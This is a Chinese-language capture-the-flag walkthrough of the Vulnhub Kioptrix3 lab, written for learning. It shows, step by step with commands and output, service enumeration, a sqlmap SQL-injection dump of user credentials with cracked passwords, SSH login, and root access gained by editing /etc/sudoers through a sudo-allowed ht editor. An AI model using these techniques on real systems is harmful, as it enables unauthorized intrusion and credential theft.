[Vulnhub] KVM3 (ht编辑器权限提升)

2024-06-04 423 0

信息获取

系统 IP:192.168.8.100

服务枚举

Server IP Address Ports Open
192.168.8.100 TCP22,80

使用Nmap扫描:

$ nmap -p- -sV -sC 192.168.8.100 --min-rate 1000

结果:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-18 04:35 EDT
Nmap scan report for 192.168.8.100 (192.168.8.100)
Host is up (0.0030s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-title: Ligoat Security - Got Goat? Security ...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.24 seconds

目录枚举

$ dirsearch -u "http://192.168.8.100/"

结果:

_|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/maptnh/reports/http_192.168.8.100/__24-05-18_04-38-27.txt

Target: http://192.168.8.100/

[04:38:27] Starting:
[04:38:29] 403 -  331B  - /.ht_wsr.txt
[04:38:29] 403 -  334B  - /.htaccess.bak1
[04:38:29] 403 -  334B  - /.htaccess.orig
[04:38:29] 403 -  336B  - /.htaccess.sample
[04:38:29] 403 -  334B  - /.htaccess.save
[04:38:29] 403 -  332B  - /.htaccess_sc
[04:38:29] 403 -  334B  - /.htaccess_orig
[04:38:29] 403 -  332B  - /.htaccessOLD
[04:38:29] 403 -  333B  - /.htaccessOLD2
[04:38:29] 403 -  335B  - /.htaccess_extra
[04:38:29] 403 -  332B  - /.htaccessBAK
[04:38:29] 403 -  325B  - /.html
[04:38:29] 403 -  324B  - /.htm
[04:38:29] 403 -  334B  - /.htpasswd_test
[04:38:29] 403 -  331B  - /.httr-oauth
[04:38:29] 403 -  330B  - /.htpasswds
[04:38:49] 301 -  353B  - /cache  ->  http://192.168.8.100/cache/
[04:38:52] 301 -  352B  - /core  ->  http://192.168.8.100/core/
[04:38:52] 200 -  688B  - /core/fragments/moduleInfo.phtml
[04:38:53] 403 -  324B  - /data
[04:38:53] 403 -  336B  - /data/adminer.php
[04:38:53] 403 -  336B  - /data/autosuggest
[04:38:53] 403 -  333B  - /data/backups/
[04:38:53] 403 -  349B  - /data/DoctrineORMModule/Proxy/
[04:38:53] 403 -  349B  - /data/DoctrineORMModule/cache/
[04:38:53] 403 -  334B  - /data/sessions/
[04:38:53] 403 -  331B  - /data/files/
[04:38:53] 403 -  325B  - /data/
[04:38:53] 403 -  331B  - /data/cache/
[04:38:53] 403 -  331B  - /data/debug/
[04:38:53] 403 -  330B  - /data/logs/
[04:38:53] 403 -  329B  - /data/tmp/
[04:38:57] 200 -   23KB - /favicon.ico
[04:38:58] 301 -  355B  - /gallery  ->  http://192.168.8.100/gallery/
[04:39:10] 301 -  355B  - /modules  ->  http://192.168.8.100/modules/
[04:39:10] 200 -    2KB - /modules/
[04:39:15] 301 -  358B  - /phpmyadmin  ->  http://192.168.8.100/phpmyadmin/
[04:39:16] 401 -  519B  - /phpmyadmin/scripts/setup.php
[04:39:16] 200 -    8KB - /phpmyadmin/
[04:39:16] 200 -    8KB - /phpmyadmin/index.php
[04:39:21] 403 -  334B  - /server-status/
[04:39:21] 403 -  333B  - /server-status
[04:39:25] 301 -  353B  - /style  ->  http://192.168.8.100/style/
[04:39:30] 200 -   18B  - /update.php

Task Completed

SQL 注入

访问目标:http://192.168.8.100/gallery/

[Vulnhub] KVM3 (ht编辑器权限提升)插图

使用searchsploit搜索Gallarific存在的历史CVE

$ searchsploit Gallarific

结果:

--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                             |  Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Gallarific - 'search.php?query' Cross-Site Scripting                                                                       | php/webapps/31369.txt
Gallarific - 'user.php' Arbirary Change Admin Information                                                                  | php/webapps/8796.html
Gallarific - Multiple Script Direct Request Authentication Bypass                                                          | php/webapps/31370.txt
Gallarific 1.1 - '/gallery.php' Arbitrary Delete/Edit Category                                                             | php/webapps/9421.txt
GALLARIFIC PHP Photo Gallery Script - 'gallery.php' SQL Injection                                                          | php/webapps/15891.txt
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------

使用:php/webapps/15891.txt

$ cat /usr/share/exploitdb/exploits/php/webapps/15891.txt

[Vulnhub] KVM3 (ht编辑器权限提升)插图1

获取数据库

$ sqlmap -u "http://192.168.8.100/gallery/gallery.php?id=1" --dbs --batch

[Vulnhub] KVM3 (ht编辑器权限提升)插图2

$ sqlmap -u "http://192.168.8.100/gallery/gallery.php?id=1" -D gallery --tables --batch

[Vulnhub] KVM3 (ht编辑器权限提升)插图3

$ sqlmap -u "http://192.168.8.100/gallery/gallery.php?id=1" -D gallery -T dev_accounts --dump --batch

[Vulnhub] KVM3 (ht编辑器权限提升)插图4

+----+---------------------------------------------+------------+
| id | password                                    | username   |
+----+---------------------------------------------+------------+
| 1  | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)   | dreg       |
| 2  | 5badcaf789d3d1d09794d8f021f40f0e (starwars) | loneferret |
+----+---------------------------------------------+------------+

SSH

$ ssh [email protected]

[Vulnhub] KVM3 (ht编辑器权限提升)插图5

3.2.1.5 Local 内容

loneferret@Kioptrix3:~$ cat /home/loneferret/Local.txt

[Vulnhub] KVM3 (ht编辑器权限提升)插图6

u28dt2i0

权限提升

loneferret@Kioptrix3:~$ sudo -l

结果:

User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht

Found that the file /usr/local/bin/ht has the SUID bit set.

loneferret@Kioptrix3:~$ ls -la /usr/local/bin/ht

[Vulnhub] KVM3 (ht编辑器权限提升)插图7

尝试运行:
loneferret@Kioptrix3:~$ /usr/local/bin/ht

结果:
Error opening terminal: xterm-256color.

使用命令export TERM=xterm以确保终端仿真器能够正确地处理和显示终端应用程序的输出。

loneferret@Kioptrix3:~$ export TERM=xterm

loneferret@Kioptrix3:~$ sudo /usr/local/bin/ht

[Vulnhub] KVM3 (ht编辑器权限提升)插图8

我们现在使用的是root权限运行ht编辑器来编辑文档。

loneferret@Kioptrix3:~$ sudo /usr/local/bin/ht /etc/sudoers

F3and/etc/sudoersandENter

[Vulnhub] KVM3 (ht编辑器权限提升)插图9

[Vulnhub] KVM3 (ht编辑器权限提升)插图10

F2保存文件

loneferret@Kioptrix3:~$ sudo /bin/bash

[Vulnhub] KVM3 (ht编辑器权限提升)插图11

Proot 内容

root@Kioptrix3:~# cat /root/Proot.txt

[Vulnhub] KVM3 (ht编辑器权限提升)插图12

d2ua8u2yd


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论